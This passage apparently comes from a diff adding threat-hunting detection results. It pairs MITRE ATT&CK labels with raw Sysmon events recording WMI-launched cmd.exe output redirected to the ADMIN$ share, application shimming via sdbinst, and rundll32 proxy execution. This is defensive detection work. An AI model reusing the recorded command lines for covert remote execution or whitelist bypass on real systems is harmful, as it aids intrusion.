+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
+    <Data Name=""LogonId"">0x1d313d</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
+    <Data Name=""ParentProcessId"">836</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:32:51.168589Z"">
+    </TimeCreated>
+    <EventRecordID>9826</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1664"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:32:51.168</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-00105F321D00</Data>
+    <Data Name=""ProcessId"">3840</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
+    <Data Name=""LogonId"">0x1d313d</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
+    <Data Name=""ParentProcessId"">836</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028584.802196,2019-03-20T00:49:44.802196+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T20:49:44.792182Z"">
+    </TimeCreated>
+    <EventRecordID>1966408</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 20:49:44.712</Data>
+    <Data Name=""ProcessGuid"">365ABB72-55E8-5C91-0000-001037DF0700</Data>
+    <Data Name=""ProcessId"">4052</Data>
+    <Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
+    <Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Compatibility Database Installer</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q &quot;C:\Windows\AppPatch\Test.SDB  &quot;  </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
+    <Data Name=""User"">EXAMPLE\user01</Data>
+    <Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
+    <Data Name=""LogonId"">0x33435</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
+    <Data Name=""ParentProcessId"">2704</Data>
+    <Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+Command run remotely Using WMI,1607599134.733908,2020-12-10T15:18:54.733908+04:00,,Threat,Critical,User (NT AUTHORITY\LOCAL SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-12-10T11:18:54.600413Z"">
+    </TimeCreated>
+    <EventRecordID>549600</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3556"" ThreadID=""4972"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-12-10 11:18:54.576</Data>
+    <Data Name=""ProcessGuid"">747F3D96-041E-5FD2-0000-001024DF3B00</Data>
+    <Data Name=""ProcessId"">5580</Data>
+    <Data Name=""Image"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">WMI Provider Host</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Wmiprvse.exe</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\LOCAL SERVICE</Data>
+    <Data Name=""LogonGuid"">747F3D96-7E79-5FD2-0000-0020E5030000</Data>
+    <Data Name=""LogonId"">0x3e5</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B</Data>
+    <Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""ParentProcessId"">832</Data>
+    <Data Name=""ParentImage"">?</Data>
+    <Data Name=""ParentCommandLine"">?</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1618950781.944115,2021-04-21T00:33:01.944115+04:00,,Threat,Low,Found User (MSEDGEWIN10\user03) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-04-20T20:33:00.384036Z"">
+    </TimeCreated>
+    <EventRecordID>578499</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3392"" ThreadID=""4112"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2021-04-20 20:33:00.318</Data>
+    <Data Name=""ProcessGuid"">747F3D96-3A7C-607F-0000-001058067700</Data>
+    <Data Name=""ProcessId"">2740</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\user03</Data>
+    <Data Name=""LogonGuid"">747F3D96-3A7C-607F-0000-002075057700</Data>
+    <Data Name=""LogonId"">0x770575</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-3A77-607F-0000-00105DD17600</Data>
+    <Data Name=""ParentProcessId"">7280</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -Version 5.1 -s -NoLogo -NoProfile</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1579034691.122589,2020-01-15T00:44:51.122589+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;cmd.exe&quot; /c notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-01-14T20:44:51.016110Z"">
+    </TimeCreated>
+    <EventRecordID>337</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1840"" ThreadID=""8032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-01-14 20:44:50.978</Data>
+    <Data Name=""ProcessGuid"">747F3D96-2842-5E1E-0000-0010745E7A00</Data>
+    <Data Name=""ProcessId"">1568</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">&quot;cmd.exe&quot; /c notepad.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-2842-5E1E-0000-0020FF3A7A00</Data>
+    <Data Name=""LogonId"">0x7a3aff</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-2842-5E1E-0000-00100C417A00</Data>
+    <Data Name=""ParentProcessId"">4180</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">rundll32 url.dll,FileProtocolHandler ms-browser://</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556656513.168589,2019-05-01T00:35:13.168589+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:35:12.449839Z"">
+    </TimeCreated>
+    <EventRecordID>9833</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1664"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:35:12.340</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B180-5CC8-0000-00102BB71E00</Data>
+    <Data Name=""ProcessId"">1504</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1</Data>
+    <Data Name=""CurrentDirectory"">C:\windows\system32\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-B17F-5CC8-0000-0020C6A31E00</Data>
+    <Data Name=""LogonId"">0x1ea3c6</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-B17F-5CC8-0000-001082A51E00</Data>
+    <Data Name=""ParentProcessId"">3572</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\mmc.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\mmc.exe -Embedding</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 url.dll,FileProtocolHandler ms-browser://)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-01-14T20:44:50.353148Z"">
+    </TimeCreated>
+    <EventRecordID>336</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1840"" ThreadID=""8032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-01-14 20:44:50.348</Data>
+    <Data Name=""ProcessGuid"">747F3D96-2842-5E1E-0000-00100C417A00</Data>
+    <Data Name=""ProcessId"">4180</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 url.dll,FileProtocolHandler ms-browser://</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-2842-5E1E-0000-0020FF3A7A00</Data>
+    <Data Name=""LogonId"">0x7a3aff</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-2842-5E1E-0000-0010903C7A00</Data>
+    <Data Name=""ParentProcessId"">1628</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-01-14T20:44:50.353148Z"">
+    </TimeCreated>
+    <EventRecordID>336</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1840"" ThreadID=""8032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-01-14 20:44:50.348</Data>
+    <Data Name=""ProcessGuid"">747F3D96-2842-5E1E-0000-00100C417A00</Data>
+    <Data Name=""ProcessId"">4180</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 url.dll,FileProtocolHandler ms-browser://</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-2842-5E1E-0000-0020FF3A7A00</Data>
+    <Data Name=""LogonId"">0x7a3aff</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-2842-5E1E-0000-0010903C7A00</Data>
+    <Data Name=""ParentProcessId"">1628</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-01-14T20:44:50.353148Z"">
+    </TimeCreated>
+    <EventRecordID>336</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1840"" ThreadID=""8032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-01-14 20:44:50.348</Data>
+    <Data Name=""ProcessGuid"">747F3D96-2842-5E1E-0000-00100C417A00</Data>
+    <Data Name=""ProcessId"">4180</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 url.dll,FileProtocolHandler ms-browser://</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-2842-5E1E-0000-0020FF3A7A00</Data>
+    <Data Name=""LogonId"">0x7a3aff</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-2842-5E1E-0000-0010903C7A00</Data>
+    <Data Name=""ParentProcessId"">1628</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436040.330766,2019-07-30T01:34:00.330766+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c netsh trace stop ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:58.683059Z"">
+    </TimeCreated>
+    <EventRecordID>4950</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:58.370</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6646-5D3F-0000-0010913A8B00</Data>
+    <Data Name=""ProcessId"">6232</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c netsh trace stop</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
